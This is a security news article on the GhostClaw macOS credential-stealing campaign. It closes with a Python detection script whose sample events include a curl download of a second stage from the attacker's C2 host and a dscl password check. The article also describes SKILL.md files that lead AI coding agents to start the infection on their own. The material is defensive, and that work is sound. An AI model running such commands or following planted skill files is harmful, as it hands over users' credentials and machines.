GhostClaw AI Assisted Malware Attacking macOS Users to Deploy Credential-Stealing Payloads

A newly documented malware campaign called GhostClaw is actively targeting macOS users through fake GitHub repositories and AI-assisted development workflows.

The campaign uses social engineering disguised as legitimate developer tools to steal user credentials and drop secondary payloads on infected systems.

GhostClaw first surfaced in early March 2026, when JFrog Security Research documented the initial campaign, then referred to as GhostClaw/GhostLoader.

The malware was distributed through malicious npm packages, targeting developers who routinely install tools from public package registries.

The campaign quickly spread beyond the npm ecosystem and into GitHub-hosted repositories that impersonated trading bots, software development kits, and other common developer utilities.

Jamf Threat Labs researchers identified eight samples linked to the same campaign after examining multiple GitHub repositories tied to the activity.

Their analysis uncovered additional infrastructure and previously unknown infection vectors, confirming that GhostClaw had expanded well beyond its original npm-based delivery method.

One notable repository, TradingView-Claw, had accumulated 386 GitHub stars, adding false credibility among unsuspecting users and developers.

TradingView-Claw repository, showing 386 stars (Source – Jamf)

What makes GhostClaw particularly dangerous is its dual infection approach. In one path, repositories contain README files with step-by-step installation instructions that prompt users to run a shell command using curl.

README file for the Antigravity Pack SDK (Source – Jamf)

In the second path, the malware targets AI coding agents through SKILL.md files that define metadata and execution commands, causing automated development tools to unknowingly trigger the infection chain.

This means GhostClaw can infect a system without any direct human involvement.

The impact of this campaign stretches beyond individual developers. By placing malicious code inside trusted ecosystems like GitHub and AI-assisted tooling, attackers were able to reach a larger number of systems through a single delivery mechanism.

Jamf Threat Labs also noted ties to related campaigns, including Glassworm and PolinRider, which used similar software supply chain techniques, pointing to a growing trend in the way attackers choose to distribute malware at scale.

Multi-Stage Infection and Credential Theft

Regardless of how the initial infection begins, GhostClaw follows a consistent multi-stage execution chain designed to harvest credentials and establish persistence on the victim’s system.

The process starts with install.sh, a bootstrapper script that presents itself as a routine setup tool. It checks the host macOS version and architecture, then silently installs a compatible version of Node.js in a user-controlled directory, avoiding any need for elevated privileges.

The script uses curl with the --insecure flag to download Node.js, bypassing TLS certificate verification, a behavior rarely seen in legitimate installers.

Execution then passes to setup.js, a heavily obfuscated JavaScript file responsible for credential collection.

To avoid raising suspicion, the script clears the terminal and displays fake progress indicators that mimic a legitimate SDK installation.

Installation process indicators and password prompt in Terminal (Source – Jamf)

A credential prompt then appears, and the supplied password is validated using the native macOS binary dscl with the -authonly option, allowing the malware to confirm stolen credentials without triggering standard system authentication dialogs.

If Full Disk Access is not already enabled, the malware presents AppleScript dialogs that closely resemble genuine macOS security prompts, walking the user through granting it in System Settings.

Once credentials are collected and access is secured, setup.js contacts the command-and-control server at trackpipe[.]dev to retrieve an encrypted secondary payload, which is written to a temporary file at /tmp/sys-opt-{random}.js.

The file is then deleted, and the malware establishes persistence by relocating itself to ~/.cache/.npm_telemetry/monitor.js — a path carefully built to blend into normal npm activity.

Users and developers should be particularly cautious when running installation commands from GitHub repositories or online guides, even when those sources appear credible.

Verifying the origin and behavior of any code before execution remains one of the most effective defenses.

Security teams managing macOS environments should watch for unexpected dscl usage for credential validation and monitor for processes attempting to gain Full Disk Access or writing obfuscated files to temporary directories.
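To make the hunting guidance above concrete, here is an added example (not Jamf's or JFrog's tooling) that runs the article's indicators as rules over process-execution events. The event format and the sample lines are constructed for the example; only the indicators themselves (curl --insecure, dscl -authonly, /tmp/sys-opt-{random}.js, ~/.cache/.npm_telemetry/monitor.js, trackpipe[.]dev) come from the article.

```python
import re

# Constructed sample process events (not a real capture); only the
# indicators embedded in them come from the article.
SAMPLE_EVENTS = """\
2026-03-12T10:01:02 pid=4021 user=dev cmd=curl -fsSL https://nodejs.org/dist/v20.0.0/node-v20.0.0-darwin-arm64.tar.gz -o node.tgz
2026-03-12T10:01:03 pid=4022 user=dev cmd=dscl . -read /Users/dev RealName
2026-03-12T10:02:11 pid=4102 user=dev cmd=curl --insecure -L https://nodejs.org/dist/v20.0.0/node-v20.0.0-darwin-arm64.tar.gz -o /Users/dev/.sdk/node.tgz
2026-03-12T10:02:40 pid=4110 user=dev cmd=dscl . -authonly dev REDACTED
2026-03-12T10:02:45 pid=4110 user=dev cmd=curl -s https://trackpipe[.]dev/stage2 -o /tmp/sys-opt-a8f3k2.js
2026-03-12T10:02:46 pid=4110 user=dev cmd=cp /tmp/sys-opt-a8f3k2.js /Users/dev/.cache/.npm_telemetry/monitor.js
"""

# (rule name, pattern over the command line, what the article says it means)
RULES = [
    ("curl-insecure-node-fetch", re.compile(r"\bcurl\b.*(--insecure|\s-k\b).*node", re.I),
     "install.sh downloads Node.js with TLS verification disabled"),
    ("dscl-authonly", re.compile(r"\bdscl\b.*-authonly"),
     "setup.js validates the phished password without a system auth dialog"),
    ("tmp-sys-opt-payload", re.compile(r"/tmp/sys-opt-[^/\s]+\.js"),
     "second stage written to /tmp/sys-opt-{random}.js"),
    ("npm-telemetry-persistence", re.compile(r"\.cache/\.npm_telemetry/monitor\.js"),
     "persistence path disguised as npm telemetry"),
    ("c2-trackpipe", re.compile(r"trackpipe(\[\.\]|\.)dev"),
     "contact with the documented C2 domain (defanged form also matched)"),
]

EVENT_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")

def scan_events(text):
    """Return (pid, rule_name, cmd) for every event whose command line trips a rule."""
    hits = []
    for line in text.splitlines():
        m = EVENT_RE.match(line)
        if not m:
            continue
        for name, pattern, _why in RULES:
            if pattern.search(m["cmd"]):
                hits.append((int(m["pid"]), name, m["cmd"]))
    return hits

def suspicious_pids(text, min_rules=2):
    """PIDs that trip at least min_rules distinct rules. A single dscl call may be
    an admin; the same process touching several stages of the chain is the signal."""
    by_pid = {}
    for pid, name, _ in scan_events(text):
        by_pid.setdefault(pid, set()).add(name)
    return sorted(pid for pid, names in by_pid.items() if len(names) >= min_rules)
```

The benign curl and dscl -read lines produce no hits, while the process that validates the password, fetches the second stage and copies it to the npm_telemetry path is the one escalated.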

The post GhostClaw AI Assisted Malware Attacking macOS Users to Deploy Credential-Stealing Payloads appeared first on Cyber Security News.

Source: cybersecuritynews.com
